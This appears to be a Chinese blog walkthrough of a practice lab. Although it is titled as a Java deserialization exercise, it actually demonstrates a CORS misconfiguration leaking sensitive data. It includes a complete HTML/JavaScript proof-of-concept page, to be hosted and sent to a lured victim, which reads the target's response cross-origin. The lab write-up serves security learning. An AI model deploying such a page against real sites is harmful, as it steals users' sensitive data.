secExample靶场之java反序列化漏洞复现

avatar
作者
猴君
阅读量:0

我是使用kali虚拟机搭建的靶场,具体搭建步骤可以看我之前的博客内容。

访问靶机地址,打开java反序列化的

点进去后是如图的页面,随便输入一信息。

可以看到敏感信息直接显示在了页面上。

访问192.168.189.141:8080/cors1,可以看到敏感信息直接显示到了页面上。

抓包查看到有cors1漏洞

将以下代码保存为一个cors.html文件,诱惑受害者点击

<html> 	<head> 		<script type="text/javascript"> 			// 当前窗口加载完毕,执行cors函数 		window.onload = function cors() { 			// 初始化一个xhttp变量 			var xhttp = new XMLHttpRequest(); 			xhttp.onreadystatechange = function () { 				if (this.readyState == 4 && this.status == 200) { 					document.getElementById("demo").innerHTML = alert( 					this.responseText 					); 				} 			}; 			xhttp.open("GET", "http://192.168.189.141:8080/cors1", true); // 只需要修改存在cors的url即可 			xhttp.withCredentials = false; 			xhttp.send(); 		}; 		</script> 	</head> <body> 		<textarea id="demo"></textarea> </body> </html>

利用web服务器

将脚本放在web服务器上,将url发给受害者。但是没有受害者,我们自己模拟一下受害者访问url地址172.16.1.65/cors.html

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!